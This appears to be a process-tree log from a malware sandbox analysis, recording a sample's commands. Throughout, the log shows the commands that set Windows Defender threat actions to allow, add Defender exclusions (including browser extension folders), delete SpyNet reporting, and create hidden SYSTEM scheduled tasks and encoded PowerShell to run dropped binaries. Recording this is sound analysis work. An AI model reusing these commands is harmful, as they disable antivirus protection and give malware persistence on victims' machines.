C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3028
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3372
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BjJZYiuqlPgU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BjJZYiuqlPgU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DIGofpDPDqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DIGofpDPDqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kpvgWGyvU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kpvgWGyvU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wStPwHPBGQsuC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wStPwHPBGQsuC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hXJwqLKSgMLJYCVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hXJwqLKSgMLJYCVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UQvARBrwpbLJoyHM\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UQvARBrwpbLJoyHM\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjJZYiuqlPgU2" /t REG_DWORD /d 0 /reg:323⤵PID:2452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjJZYiuqlPgU2" /t REG_DWORD /d 0 /reg:643⤵PID:4340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DIGofpDPDqUn" /t REG_DWORD /d 0 /reg:323⤵PID:3256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DIGofpDPDqUn" /t REG_DWORD /d 0 /reg:643⤵PID:4156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FcokcjqiGXWmUJvFooR" /t REG_DWORD /d 0 /reg:323⤵PID:1132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kpvgWGyvU" /t REG_DWORD /d 0 /reg:323⤵PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FcokcjqiGXWmUJvFooR" /t REG_DWORD /d 0 /reg:643⤵PID:3432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kpvgWGyvU" /t REG_DWORD /d 0 /reg:643⤵PID:3392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wStPwHPBGQsuC" /t REG_DWORD /d 0 /reg:323⤵PID:4772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wStPwHPBGQsuC" /t REG_DWORD /d 0 /reg:643⤵PID:3720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hXJwqLKSgMLJYCVB /t REG_DWORD /d 0 /reg:323⤵PID:1200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hXJwqLKSgMLJYCVB /t REG_DWORD /d 0 /reg:643⤵PID:4128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ /t REG_DWORD /d 0 /reg:323⤵PID:3596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ /t REG_DWORD /d 0 /reg:643⤵PID:4496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UQvARBrwpbLJoyHM /t REG_DWORD /d 0 /reg:323⤵PID:1052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UQvARBrwpbLJoyHM /t REG_DWORD /d 0 /reg:643⤵PID:3972
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqhmvdLFW" /SC once /ST 06:17:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqhmvdLFW"2⤵PID:1628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqhmvdLFW"2⤵PID:2740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdrESRlZGEayfzFZZ" /SC once /ST 06:03:47 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UQvARBrwpbLJoyHM\oXOkPfocJkmMRby\iqSTDyt.exe\" xT /bAsite_idaaO 385121 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bdrESRlZGEayfzFZZ"2⤵PID:2708
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjJZYiuqlPgU2" /t REG_DWORD /d 0 /reg:321⤵PID:812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3760 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3896
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4712
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4080
-
C:\Windows\Temp\UQvARBrwpbLJoyHM\oXOkPfocJkmMRby\iqSTDyt.exeC:\Windows\Temp\UQvARBrwpbLJoyHM\oXOkPfocJkmMRby\iqSTDyt.exe xT /bAsite_idaaO 385121 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4156 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bqEFPgBHoYySYAkccD"2⤵PID:368
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4128
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:3004
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4952
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\kpvgWGyvU\TIbnXj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "unWYiNUJqAlITwd" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "unWYiNUJqAlITwd2" /F /xml "C:\Program Files (x86)\kpvgWGyvU\GrRvScR.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1392
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "unWYiNUJqAlITwd"2⤵PID:2932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "unWYiNUJqAlITwd"2⤵PID:3228
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CvAfdqtpQkofiq" /F /xml "C:\Program Files (x86)\BjJZYiuqlPgU2\SSFxugC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2488
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XKFRqCCIaTSsN2" /F /xml "C:\ProgramData\hXJwqLKSgMLJYCVB\EUXCMoM.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EwxjatFcEcEtOgckL2" /F /xml "C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\AjdCZrS.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RKCqzJUCMLcMgcDeikF2" /F /xml "C:\Program Files (x86)\wStPwHPBGQsuC\DPUYNBZ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2352
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jRVNJXEqUfFueAuNO" /SC once /ST 13:23:35 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UQvARBrwpbLJoyHM\GfKYHGpV\lcKhGjL.dll\",#1 /hGsite_iddLc 385121" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jRVNJXEqUfFueAuNO"2⤵PID:1072
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3960
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:5020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:4840
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2460
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bdrESRlZGEayfzFZZ"2⤵PID:4588
-
-
